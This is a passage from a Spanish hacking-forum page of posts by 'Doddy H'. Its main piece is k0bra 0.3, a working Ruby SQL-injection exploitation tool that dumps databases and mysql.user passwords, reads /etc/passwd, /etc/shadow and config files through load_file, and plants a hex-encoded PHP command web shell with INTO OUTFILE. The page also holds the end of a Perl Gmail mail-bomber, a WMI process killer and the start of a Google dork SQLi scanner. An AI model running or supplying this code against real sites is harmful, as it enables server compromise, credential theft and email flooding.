    -background => $color_fondo, -foreground => $color_texto
)->place( -x => 20, -y => 270 );
my $tema = $ve->Entry(
    -text => "Hi idiot", -width => 20,
    -background => $color_fondo, -foreground => $color_texto
)->place( -x => 73, -y => 273 );
$ve->Label(
    -text => "Body", -font => "Impact3",
    -background => $color_fondo, -foreground => $color_texto
)->place( -x => 110, -y => 310 );
my $body = $ve->Text(
    -width => 30, -height => 12,
    -background => $color_fondo, -foreground => $color_texto
)->place( -x => 45, -y => 350 );
$body->insert( "end", "Welcome to the hell" );

# Buttons.
$ve->Button(
    -text => "Send", -width => 10, -command => \&start,
    -background => $color_fondo, -foreground => $color_texto,
    -activebackground => $color_texto
)->place( -x => 43, -y => 550 );
$ve->Button(
    -text => "About", -width => 10, -command => \&about,
    -background => $color_fondo, -foreground => $color_texto,
    -activebackground => $color_texto
)->place( -x => 117, -y => 550 );
$ve->Button(
    -text => "Exit", -width => 10, -command => [ $ve => "destroy" ],
    -background => $color_fondo, -foreground => $color_texto,
    -activebackground => $color_texto
)->place( -x => 190, -y => 550 );

MainLoop;

# "Send": open one session with the account from the window and send the
# message the requested number of times over it.
# The result of send() is not checked, so the "Mails Send" box appears even
# if individual sends failed.
sub start {
    $text = $body->get( "1.0", "end" );    # package global, not "my"
    if ( my $mail = Email::Send::SMTP::Gmail->new(
            -smtp => "gmail.com", -login => $user->get, -pass => $pass->get ) )
    {
        # NOTE(review): the loop variable is also called $number; the range
        # expression presumably still reads the entry widget declared
        # above -- confirm.
        for my $number ( 1 .. $number->get ) {
            $ve->update;    # keep the window responsive between sends
            $mail->send( -to => $to->get, -subject => $tema->get, -body => $text );
        }
        Win32::MsgBox( "Send", 0, "Mails Send" );
        $mail->bye;
    }
    else {
        Win32::MsgBox( "Error in the login", 0, "Error" );
    }
}

# About box.
sub about {
    my $text = "This program was written by Doddy H for the Tournament of Programming Perl to forum HackxCrack";
    Win32::MsgBox( $text, 0, "About" );
}

#The End ?
286
Programación / Scripting / [Ruby] k0bra 0.3
en: 16 Febrero 2012, 18:16 pm
Un simple scanner SQLI con las siguientes funciones - Comprobar vulnerabilidad
- Buscar numero de columnas
- Buscar automaticamente el numero para mostrar datos
- Mostrar tablas
- Mostrar columnas
- Mostrar bases de datos
- Mostrar tablas de otra DB
- Mostrar columnas de una tabla de otra DB
- Mostrar usuarios de mysql.user
- Buscar archivos usando load_file
- Mostrar un archivo usando load_file
- Mostrar valores
- Mostrar informacion sobre la DB
- Crear una shell usando outfile
- Todo se guarda en logs ordenados
#!usr/bin/ruby #K0bra 0.3 #Coded By Doddy H require "net/http" $files = ['C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.l
og','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/
httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:
\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog'] def toma(web) return Net::HTTP.get_response(URI.parse(web)).body end def copyright() print "\n\n(C) Doddy Hackman 2012\n\n" gets.chomp end def installer() dir = Dir::pwd+"/"+"logs_webs" if not FileTest::directory?(dir) Dir::mkdir(dir) end end def encodehex(texto) return "0x"+(texto.unpack('H*')[0]) end def savefile(file,text) url = URI.parse(file) save = File.open("logs_webs/"+url.host+".txt","a") save.puts text+"\n" save.close end def bypass(op) if op=="--" return "+","--" elsif op=="/*" return "/**/","/**/" elsif op=="%20" return "%20","%00" else return "+","--" end end def head() print " @ @@ @ @@ @ @ @@ @ @@ @ @ @ @ @ @ @@@ @ @ @ @ @@ @ @@@ @ @ @@ @ @ @ @ @ @@@ @ @ @ @ @ @ @ @ @ @@@ @ @@ @@@ @@@ @@@@@ " end def volverinicio() 
print "\n\n[+] Press any key to continue\n\n" gets.chomp inicio() end def clean() if RUBY_PLATFORM=~/win/ system("cls") else system("clear") end end def retorno(url,by) print "\n\n[+] Press any key to continue\n\n" gets.chomp central(url,by) end def gettables(url,by) pass1,pass2 = bypass(by) web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))") web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))") print "\n\n[+] Getting tables ...\n\n" code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2) if code1=~/K0BRA(.*?)K0BRA/ total = $1 print "[+] Tables Found : ",total,"\n\n" savefile(url,"\n[+] Tables Found : #{total}\n") for num in ("17"..total) code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+num+",1"+pass2) if code2=~/K0BRA(.*?)K0BRA/ table = $1 print "[+] Table Found : "+table+"\n" savefile(url,"[+] Table Found : #{table}") end end else print "[-] Not Found\n" end end def getcolumns(url,by,tablex) tablexa = encodehex(tablex) pass1,pass2 = bypass(by) web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))") web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))") print "\n\n[+] Getting columns ...\n\n" code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass2) if code1=~/K0BRA(.*?)K0BRA/ total = $1 print "[+] Columns Found : ",total,"\n\n" savefile(url,"\n[+] Table : #{tablex}") savefile(url,"[+] Columns Found : #{total}\n") for num in ("0"..total) code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass1+"limit"+pass1+num+",1"+pass2) if code2=~/K0BRA(.*?)K0BRA/ table = $1 print "[+] Column Found : "+table+"\n" savefile(url,"[+] Column Found : #{table}") end end else print "[-] Not Found\n" end end def getdbs(url,by) pass1,pass2 = bypass(by) web1 = 
url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))") web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))") print "\n\n[+] Getting DBS ...\n\n" code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2) if code1=~/K0BRA(.*?)K0BRA/ total = $1 print "[+] DBS Found : ",total,"\n\n" savefile(url,"\n[+] DBS Found : #{total}\n") for num in ("0"..total) code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+num+",1"+pass2) if code2=~/K0BRA(.*?)K0BRA/ table = $1 print "[+] DB Found : "+table+"\n" savefile(url,"[+] DB Found : #{table}") end end else print "[-] Not Found\n" end end def gettablesbydb(url,by,dbx) data = encodehex(dbx) pass1,pass2 = bypass(by) web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))") web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))") print "\n\n[+] Getting tables ...\n\n" code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass2) if code1=~/K0BRA(.*?)K0BRA/ total = $1 print "[+] Tables Found : ",total,"\n\n" savefile(url,"\n[+] DBS : #{dbx}") savefile(url,"[+] Tables Found : #{total}\n") for num in ("0"..total) code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2) if code2=~/K0BRA(.*?)K0BRA/ table = $1 print "[+] Table Found : "+table+"\n" savefile(url,"[+] Table Found : #{table}") end end else print "[-] Not Found\n" end end def getcolumnsbydb(url,by,db,tab) data = encodehex(db) tabx = encodehex(tab) pass1,pass2 = bypass(by) web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))") web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))") print "\n\n[+] Getting columns ...\n\n" code1 = 
toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass2) if code1=~/K0BRA(.*?)K0BRA/ total = $1 print "[+] Columns Found : ",total,"\n\n" savefile(url,"\n[+] DB : #{db}") savefile(url,"[+] Table : #{tab}") savefile(url,"[+] Columns Found : #{total}\n") for num in ("0"..total) code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2) if code2=~/K0BRA(.*?)K0BRA/ table = $1 print "[+] Column Found : "+table+"\n" savefile(url,"[+] Column Found : #{table}") end end else print "[-] Not Found\n" end end def mysqluser(url,by) pass1,pass2 = bypass(by) web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))") web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))") print "\n\n[+] Searching mysql.user\n\n" code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2) if code1=~/K0BRA(.*?)K0BRA/ total = $1 print "[+] Users Mysql Found : ",total,"\n\n" savefile(url,"[+] Users Mysql Found : "+total+"\n") for num in ("0"..total) code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+num+",1"+pass2) if code2=~/K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2/ host,user,passw = $1,$2,$3 print "[Host] : "+host print " [User] : "+user print " [Pass] : "+passw+"\n" savefile(url,"[Host] : "+host) savefile(url,"[User] : "+user) savefile(url,"[Pass] : "+passw+"\n") end end else print "[-] Not Found\n" end end def details(url,by) pass1,pass2 = bypass(by) hextest = "0x2f6574632f706173737764" #/etc/passwd hextest = "0x633A2F78616D70702F726561642E747874" #c:/xampp/read.txt web1 = url.sub(/hackman/,"0x4b30425241") web2 = url.sub(/hackman/,"concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)") web3 = 
url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))") print "\n\n[+] Extrating information of the DB\n\n" code1 = toma(web2) if code1=~/K0BRA(.*)K0BRA(.*)K0BRA(.*)K0BRA/ user,data,ver = $1,$2,$3 print "\n[+] Username : "+user print "\n[+] Database : "+data print "\n[+] Version : "+ver+"\n\n" savefile(url,"\n[+] Username : "+user) savefile(url,"[+] Database : "+data) savefile(url,"[+] Version : "+ver+"\n") else print "[-] Not Found\n" end code2 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2) code3 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2) code4 = toma(web3) if code2=~/K0BRA/ print "[+] Mysqluser : ON\n" savefile(url,"[+] Mysqluser : ON") end if code3=~/K0BRA/ print "[+] information_schema : ON\n" savefile(url,"[+] information_schema : ON") end if code4=~/ERTOR854/ print "[+] load_file : ON\n" savefile(url,"[+] load_file : ON") end savefile(url,"") #espacio en blanco end def dumper(url,by,table,col1,col2) pass1,pass2 = bypass(by) web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))") web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,"+col2+",0x4b30425241)))") print "\n\n[+] Getting Values ...\n\n" code1 = toma(web1+pass1+"from"+pass1+table+pass2) if code1=~/K0BRA(.*?)K0BRA/ total = $1 savefile(url,"\n[+] Table : "+table) savefile(url,"[+] Column 1 : "+col1) savefile(url,"[+] Column 2 : "+col2) print "[+] Values Found : ",total,"\n\n" savefile(url,"\n[+] Values Found : #{total}\n") for num in ("0"..total) code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+num+",1"+pass2) if code2=~/K0BRA(.*)K0BRA(.*)K0BRA/ uno,dos = $1,$2 print "\n[+] "+col1+" : "+uno+"\n" print "[+] "+col2+" : "+dos+"\n" savefile(url,"\n[+] "+col1+" : "+uno) savefile(url,"[+] "+col2+" : "+dos) end end else print "[-] Not Found\n" end end def fuzzfile(url,by) pass1,pass2 = bypass(by) print "\n\n[+] Fuzzing Files with load_file ....\n" $files.each do |file| res = file 
file = file.chomp file = encodehex(file) web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))") code = toma(web1) if code=~/ERTOR854(.*?)ERTOR854/m print "\n\n[File Found] : ",res print "\n\n[Source Start]\n" print $1 print "\n[Source End]" savefile(url,"\n[File Found] : "+res) savefile(url,"\n[Source Start]\n") savefile(url,$1) savefile(url,"\n[Source End]") end end end def abrirfile(url,by,file) pass1,pass2 = bypass(by) print "\n\n[+] Opening file ....\n" res = file file = encodehex(file) web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))") code = toma(web1) if code=~/ERTOR854(.*?)ERTOR854/m print "\n\n[File Found] : ",res print "\n\n[Source Start]\n" print $1 print "\n[Source End]" savefile(url,"\n[File Found] : "+res) savefile(url,"\n[Source Start]\n") savefile(url,$1) savefile(url,"\n[Source End]") else print "\n\n[-] Error\n\n" end end def into(url,by,full,dir) pass1,pass2 = bypass(by) linea= "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e" lugar = full+"/cmd.php" lugardos = dir+"/cmd.php" h = URI.parse(url) webtest = "http://"+h.host+lugardos web1 = url.sub(/hackman/,linea) formandoweb = web1+pass1+"into"+pass1+"outfile"+pass1+"'"+lugar+"'"+pass2 toma(formandoweb) code = toma(webtest) if code=~/Mini Shell By Doddy/ print "\n\n[shell up] : "+webtest+"\n" savefile(url,"\n[shell up] : "+webtest+"\n") else print "\n\n[-] Error\n" end end def central(url,by) clean() head() print "\n\n[+] Page : #{url}\n" print "[+] ByPass : #{by}\n\n\n" print "\n[information_schema]\n\n" print "1 - Show tables\n" print "2 - Show columns of the a table\n" print "3 - Show databases\n" print "4 - Show tables from the a DB\n" print "5 - Show columns from the a table of the DB\n" print 
"\n[mysql.user]\n\n" print "6 - Show users\n" print "\n[Others]\n\n" print "7 - Show details\n" print "8 - Dump data\n" print "9 - Fuzz Files with load_file\n" print "10 - Load files with load_file\n" print "11 - Create Shell\n" print "12 - Show log\n" print "13 - Change target\n" print "14 - Exit\n\n" print "[+] Option : " op = gets.chomp if op == "1" gettables(url,by) retorno(url,by) elsif op == "2" print "\n\n[+] Table : " table = gets.chomp getcolumns(url,by,table) retorno(url,by) elsif op == "3" getdbs(url,by) retorno(url,by) elsif op == "4" print "\n\n[+] DB : " db = gets.chomp gettablesbydb(url,by,db) retorno(url,by) elsif op == "5" print "\n\n[+] DB : " db = gets.chomp print "\n\n[+] Table : " tab = gets.chomp getcolumnsbydb(url,by,db,tab) retorno(url,by) elsif op == "6" mysqluser(url,by) retorno(url,by) elsif op == "7" details(url,by) retorno(url,by) elsif op == "8" print "\n\n[+] Table : " table = gets.chomp print "\n\n[+] Column 1 : " col1 = gets.chomp print "\n\n[+] Column 2 : " col2 = gets.chomp dumper(url,by,table,col1,col2) retorno(url,by) elsif op == "9" fuzzfile(url,by) retorno(url,by) elsif op == "10" print "\n\n[+] File : " file = gets.chomp abrirfile(url,by,file) retorno(url,by) elsif op == "11" print "\n\n[Full Source Discloure] : " full = gets.chomp print "\n\n[Directory to test] : " dir = gets.chomp into(url,by,full,dir) retorno(url,by) elsif op == "12" urla = URI.parse(url) ar = "logs_webs/"+urla.host+".txt" system("start #{ar}") retorno(url,by) elsif op == "13" inicio() elsif op == "14" copyright() else retorno(url,by) end end def findlength(url,by) pass1,pass2 = bypass(by) z = "1" x = "concat(0x4b30425241,1,0x4b30425241)" for num in ('2'..'25') z = z+","+num x= x+","+"concat(0x4b30425241,"+num+",0x4b30425241)" code = toma(url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+x) if code=~/K0BRA(.*?)K0BRA/ print "[+] The Page has "+num+" columns\n" print "[+] The number "+$1+" print data" z = z.sub($1,"hackman") sqli = 
url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+z savefile(url,"[+] SQLI : "+sqli) savefile(url,"[+] Bypass : "+by+"\n") central(sqli,by) end end end def testvul(page,by) pass1,pass2 = bypass(by) print "\n\n[+] Testing vulnerability ...\n\n" codeuno = toma(page+"1"+pass1+"and"+pass1+"1=0"+pass2) codedos = toma(page+"1"+pass1+"and"+pass1+"1=1"+pass2) if codeuno != codedos print "[+] Vulnerable !\n" findlength(page,by) else print "[-] Not vulnerable\n" print "\n\n[+] Scan anyway y/n : " op = gets.chomp if op == "y" findlength(page,by) else volverinicio() end end end def inicio() clean() head() print "\n\n[+] Page : " page = gets.chomp print "\n\n[+] Bypass : " by = gets.chomp if page=~/hackman/ central(page,by) else testvul(page,by) end end installer() inicio() # The End ?
|
|
|
287
|
Programación / Scripting / [Ruby] ManProcess 0.1
|
en: 16 Febrero 2012, 18:14 pm
|
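Un simple programa para manejar los procesos en Windows.

#!usr/bin/ruby
#ManProcess 0.1
#Coded By Doddy H
#
# Interactive console menu that lists or terminates Windows processes through
# WMI (Win32_Process), reached with WIN32OLE. Windows only.
#
# Option 2 terminates every process whose image name equals the text typed by
# the user, with the privileges of the account running the script.

require "win32ole"

# Print the program banner.
def head()
  print "\n\n-- == Man Process 0.1 == --\n\n"
end

# Print the credits and leave the program (exit status 1, as the script
# has always done).
def copyright()
  print "\n\n(C) Doddy Hackman 2012\n\n"
  exit(1)
end

# Read one line from standard input without its line ending.
# When standard input is closed, gets returns nil; the program then ends
# through copyright() instead of failing on nil.chomp.
def leer()
  linea = gets
  copyright() if linea.nil?
  linea.chomp
end

# Wait for the user to press Enter before the menu is shown again.
def retor()
  print "\n\n[+] Press any key to continue\n\n"
  leer()
end

# Escape a value for use inside a single-quoted WQL string literal.
# Backslash is the WQL escape character, so a quote or backslash typed by
# the user is prefixed with one and stays part of the literal instead of
# ending it and changing the query.
def wql_literal(valor)
  valor.gsub(/[\\']/) { |c| "\\" + c }
end

wmi = nil

loop do
  head()
  print "1 - Show Process\n"
  print "2 - Close Process\n"
  print "3 - Exit\n\n\n"
  print "[+] Option : "
  op = leer()

  case op
  when "1"
    print "\n\n[+] Getting process...\n\n"
    wmi ||= WIN32OLE.connect("winmgmts://")
    wmi.ExecQuery("select * from win32_process").each do |po|
      print "[+] Name : ",po.Caption," [+] PID : ",po.ProcessId,"\n"
    end
    retor()
  when "2"
    print "\n\n[+] Name : "
    name = leer()
    wmi ||= WIN32OLE.connect("winmgmts://")
    encontrados = 0
    cerrados = 0
    wmi.ExecQuery("select * from Win32_process where name='#{wql_literal(name)}'").each do |pro|
      encontrados += 1
      begin
        # Terminate reports 0 on success; any other code (for example
        # access denied) means the process is still running.
        cerrados += 1 if pro.Terminate == 0
      rescue StandardError
        # The process may already have exited between the query and the call.
      end
    end
    # Report what actually happened rather than always claiming success.
    if encontrados == 0
      print "\n\n[-] Process not found\n\n"
    elsif cerrados == encontrados
      print "\n\n[+] Process Closed\n\n"
    else
      print "\n\n[-] Closed #{cerrados} of #{encontrados} processes\n\n"
    end
    leer()
  when "3"
    copyright()
  else
    print "\n\n[-] Bad Option\n\n"
    retor()
  end
end

# The End ?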
|
|
|
288
|
Programación / Scripting / [Ruby] Hex Converter 0.1
|
en: 16 Febrero 2012, 18:12 pm
|
Un simple codigo para convertir texto a hex.

#!usr/bin/ruby
#Hex Converter 0.1
#Coded By Doddy H
#
# Prints the first command-line argument as a hexadecimal string with a
# leading "0x". Without an argument it prints the usage line instead.

# Show the program banner.
def head()
  print "\n -- == Hex Converter 0.1 == --\n"
end

# Show the credits and end the program with exit status 1.
def copyright()
  print "\n\n(C) Doddy Hackman 2012\n\n"
  exit(1)
end

# Show how the script is meant to be called.
def sintax()
  print "\n\n[+] ruby hex.rb <text>\n"
end

# Return +texto+ as "0x" followed by the hex digits of its bytes
# (unpack 'H*': high nibble first).
def encodehex(texto)
  digitos = texto.unpack('H*').first
  "0x" + digitos
end

# Print the input text and its hex form.
def hex(texto)
  print "\n\n[+] Text : #{texto}\n", "[+] Result : ", encodehex(texto), "\n\n"
end

entrada = ARGV[0]
head()
if entrada
  hex(entrada)
else
  sintax()
end
copyright()

# The End ?
|
|
|
289
|
Programación / Scripting / [Ruby] Google Search 0.3
|
en: 11 Febrero 2012, 23:06 pm
|
Un buscador de google , con la opcion de poder hacer un scanner SQLI en las paginas encontradas.

#!usr/bin/ruby
#Google Search 0.3
#Coded By Doddy H
#
# Console menu with two functions: collect result links from a search engine
# query into a text file, and request each URL of a list with a fixed SQL
# probe appended, reporting the ones whose response contains a MySQL
# column-count error message.
#
# For whoever operates the receiving web server: every probe request carries
# the literal text "1+and+1=0+union+select+1--" in the query string, which is
# straightforward to match in access logs or a request filter. The check only
# succeeds when the application returns database error text to the client;
# parameterized queries remove the underlying flaw, and generic error pages
# remove the signal this script looks for.

require "net/http"

# Fetch +web+ with an HTTP GET and return the response body.
# No request headers, timeouts or error handling are set here.
def toma(web)
  return Net::HTTP.get_response(URI.parse(web)).body
end

# Read +file+ and return its lines as an array.
# When +file+ is not a regular file an error line is printed and the method
# returns nil (the value of print), so callers receive nil, not an empty list.
def openwords(file)
  if File.file?(file)
    print "[+] Opening file\n\n"
    ar = File.open(file)
    lineas = ar.readlines
    ar.close
    print "[+] Number of words : ",lineas.length,"\n\n"
    return lineas
  else
    print "[-] Error opening file\n"
  end
end

# Print the program banner.
def head()
